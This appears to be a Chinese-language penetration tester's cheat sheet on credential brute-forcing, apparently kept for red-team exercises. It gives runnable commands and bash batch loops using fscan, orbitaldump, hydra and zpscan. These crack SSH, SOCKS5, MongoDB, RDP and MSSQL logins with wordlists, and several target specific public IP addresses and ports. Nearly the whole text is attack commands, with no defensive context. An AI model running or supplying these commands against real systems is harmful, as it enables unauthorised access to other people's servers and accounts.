爆破
目录
ssh
ssh密码
https://github.com/NewBee119/ssh-scanner.git
fscan
fscan是可以手动ssh爆破的,只是效果不太理想
./fscan -m ssh
orbitaldump
pip install -U --user orbitaldump
python -m orbitaldump
python -m orbitaldump -t 10 -u usernames.txt -p passwords.txt -h example.com --proxies
hydra
hydra是爆破神奇,但是爆破ssh需要额外安装模块,有点麻烦。备用
socks5
hydra
./hydra -L ~/Documents/security/tools/zidian/username_deafult.txt -P ~/Documents/security/tools/zidian/Top50.txt socks5://116.162.51.88:8001
mongodb
zpscan
./zpscan_darwin crack -i "180.184.70.193:3717|mongodb"
批量脚本
while IFS= read -r line
do
./zpscan_darwin crack -i "${line}|mongodb"
done < "/Users/CONST27/Documents/project/honglan/9.25/mongodb.txt"
fscan
不如zpscan+bash脚本
RDP
zpscan
./zpscan_darwin crack -i "180.184.70.193:3389|rdp"
批量脚本
while IFS= read -r line
do
./zpscan_darwin crack -i "${line}|rdp"
done < "/Users/CONST27/Documents/project/honglan/9.25/rdp.txt"
mssql
zpscan
./zpscan_darwin crack -i "180.184.70.193:1433|mssql"
while IFS= read -r line
do
./zpscan_darwin crack -i "${line}|mssql"
done < "/Users/CONST27/Documents/project/honglan/9.25/mssql_url.txt"
mysql
zpscan
Redis
zpscan
密码生成
https://github.com/sry309/PwdBUD.git